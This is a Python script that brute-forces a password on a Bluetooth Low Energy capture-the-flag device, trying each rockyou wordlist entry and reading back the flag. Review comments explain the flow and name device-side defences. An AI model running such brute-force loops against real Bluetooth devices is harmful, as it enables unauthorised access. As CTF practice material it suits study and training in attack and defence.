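#! /usr/bin/python
"""Try each wordlist entry as the level-02 password on a BLE CTF peripheral.

Flow, as the code below shows:
  1. Read the target's MAC address from ``ctf_mac.txt`` and connect to it.
  2. Write the 16-bit value 0x0002 to handle 0x30 ("Loading level 02").
  3. For each line of the wordlist, write it to handle 0x2A and read
     handle 0x2C; the first non-empty read is printed as the flag.

NOTE(review): the original used Python 2 print statements and the ``<>``
operator. The syntax here is valid on both Python 2 and 3, but the values
passed to bluepy are still Python 2 byte strings; running under Python 3
would need explicit bytes handling and has not been checked.
"""
import binascii
import struct
import sys
import os
import time

import bluepy.btle as btle

# Handle map recorded by the original author for this level:
#   42  0x2A  READ WRITE  Enter password here. Use rockyou.
#   44  0x2C  READ
#   46  0x2E  READ WRITE  write here to goto to scoreboard
#
#   password1234 - eca7d1f3cf60a8b5344a
#
# NOTE(review): the level-select write below goes to handle 0x30, which is
# not in this table; presumably a separate navigation handle -- confirm.

rockyou = "/opt/SecLists/Passwords/Leaked-Databases/rockyou.txt"

# Close the file promptly and drop the trailing newline an editor normally
# leaves after the address, so the connect call gets the bare MAC.
with open('ctf_mac.txt') as mac_file:
    deviceMAC = mac_file.read().strip()

p = btle.Peripheral(deviceMAC)
try:
    # The result is unused; the lookup is kept because it was in the original
    # and presumably fails early if the expected service is absent.
    svc = p.getServiceByUUID(0x00FF)
    print("Attached to peripheral")

    print("Loading level 02")
    # '%04x' % 2 -> '0002' -> the two bytes 0x00 0x02.
    level_value = binascii.unhexlify('%04x' % 2)
    p.writeCharacteristic(0x30, level_value, withResponse=False)

    # NOTE(review): nothing here pairs or authenticates before writing, and
    # the loop sends one guess per wordlist line with no delay. It can only
    # succeed if the peripheral accepts unlimited attempts; the matching
    # device-side controls would be attempt limiting and requiring a bonded,
    # encrypted link for this characteristic (inferred, not shown here).
    with open(rockyou) as f:
        for password in f:
            candidate = password.rstrip()
            sys.stdout.write("\rTrying: %s " % candidate)
            p.writeCharacteristic(0x2A, candidate, withResponse=True)
            # The original hex-encoded and immediately decoded this value,
            # which is a no-op; the raw read is tested directly.
            flag = p.readCharacteristic(0x2C)
            if flag:
                print("\rPassword Found: %s" % candidate)
                print("Flag: %s" % flag)
                break
finally:
    # Release the connection even when a BLE error or Ctrl-C interrupts the
    # loop; the original only disconnected on a clean run.
    p.disconnect()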